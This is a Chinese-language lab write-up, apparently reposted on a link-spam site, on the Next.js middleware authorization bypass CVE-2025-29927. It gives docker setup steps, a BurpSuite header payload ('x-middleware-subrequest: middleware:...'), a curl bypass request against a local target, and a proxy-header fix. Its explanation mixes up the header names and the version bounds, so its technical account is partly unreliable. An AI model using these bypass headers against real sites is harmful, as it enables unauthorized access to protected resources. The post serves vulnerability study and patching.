当前位置: 首页 > wzjs >正文

成都市建设学校网站青岛做网站服务商

成都市建设学校网站,青岛做网站服务商,招聘网站排行榜,c4d培训机构推荐前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞&#xff0c;源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部&#xff0c;实现绕过中间件逻辑&#xff0c;访问本应受保护的资源或 API。 影响版本&#xff1a;Next.js < …

前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞,源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部,实现绕过中间件逻辑,访问本应受保护的资源或 API。

影响版本:Next.js < 14.1.4
成因概括:攻击者利用请求头控制中间件行为,重写跳转目标路径,进而绕过路由拦截。

任务一 启动环境

cd next.js/
cd CVE-2025-29927/
docker compose up -d
//3000就是靶机端口

 

 任务二 打开BurpSuite

代理->代理设置->响应拦截规则(勾选)

随便输入一个弱口令 返回的是/login 没有成功

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
//在bp加入一个头部,返回了200成功了

任务三 拓展 | 本地 

import { NextResponse } from 'next/server';
import type { NextRequest } from 'next/server';export function middleware(request: NextRequest) {const token = request.cookies.get('token');if (!token) {return NextResponse.redirect(new URL('/login', request.url));}return NextResponse.next();
}//创建中间件 middleware.ts
curl -i http://localhost:3000/api/admin \-H "X-Middleware-Rewrite: /api/public" \-H "Cookie: token=malicious"
//构造绕过请求,模拟攻击
//原本未登录用户访问 /api/admin 会被跳转到 /login,构造该头部后,成功伪装访问 /api/public,绕过登录校验。

任务四 修复 

//防御措施
proxy_set_header X-Middleware-Rewrite "";
//中间件中加入请求来源验证机制,防止伪造

官方修复版本:14.1.4
GitHub Release Note 


文章转载自:

http://1llGhCtR.fmrrr.cn
http://xnf2SKFF.fmrrr.cn
http://GAOWlD8Y.fmrrr.cn
http://Kt75PqPq.fmrrr.cn
http://Ey8vh9Et.fmrrr.cn
http://FltQLBBZ.fmrrr.cn
http://iiA639ZK.fmrrr.cn
http://Khk2F9fD.fmrrr.cn
http://Nm4W9ZcG.fmrrr.cn
http://wU5nqBIj.fmrrr.cn
http://o34P1Ygv.fmrrr.cn
http://9CMzD6qL.fmrrr.cn
http://i4T18THY.fmrrr.cn
http://nPV5NLor.fmrrr.cn
http://W56dNb6q.fmrrr.cn
http://JxZAvMhX.fmrrr.cn
http://oj0YpsSL.fmrrr.cn
http://14WREfMJ.fmrrr.cn
http://erPyndKb.fmrrr.cn
http://S5XnOBQI.fmrrr.cn
http://gr5bfeFY.fmrrr.cn
http://VsT1TfFc.fmrrr.cn
http://zEkdMv9x.fmrrr.cn
http://svuwWhTB.fmrrr.cn
http://88BueeDj.fmrrr.cn
http://wJOrTKbR.fmrrr.cn
http://DPUQYjwN.fmrrr.cn
http://Q8m34OVx.fmrrr.cn
http://uTPWc7nM.fmrrr.cn
http://JBcx70xz.fmrrr.cn
http://www.dtcms.com/wzjs/664882.html

相关文章:

  • 网站解析域名提升学历图片素材
  • 做网站普洱数据分析报告
  • 免费公司网站申请建设银行网站登陆二星是什么意思
  • 甘肃省建设局官方网站电商网站建设实训要求
  • 山东鑫泰建设集团网站wordpress获取权限
  • 屏蔽阿里云网站吗凤翔网站开发
  • 股票配资系统网站开发深圳福田做网站公司哪家好
  • 做家教的网站凡客网站建站教程
  • 网站拥有权安卓商城网站开发
  • 网站权重优化网页设计与制作项目教程陈义文
  • 网站会对特殊的ip做跳转seo的主要工作内容
  • 做网站卖赚钱吗网站名称及网址
  • 做网站有什么好的推荐有什么网站是做中式酒店大堂的
  • 邢台提供网站建设公司报价江西省建设厅网站官网
  • 下载类网站如何做网站开发类论文题目
  • 山西餐饮加盟网站建设网页托管平台排名
  • seo免费优化网站网站平台建设费用的会计核算
  • 网站举报在哪举报今天上海大事件
  • 网站面包屑如何做做视频网站的空间
  • 冀州网站优化重庆市价格信息网官网
  • 外贸行业网站建设国内十大咨询公司排名
  • 建设银行网网站一级建造师求职网
  • 青岛市两个体系建设网站组织架构及营销网络怎么填写
  • 怎样做网站表白墙仿站网站开发
  • 山东建设执业师官方网站做色网站
  • 小说章节收费网站建设济南公司做网站的价格
  • 给网站做数据分析wordpress修改编辑器
  • 广东建设网站北京大兴做环保备案网站
  • 电子商务网站建设模板下载吉利汽车网站开发环境分析
  • 网站建设 平易乐清建站公司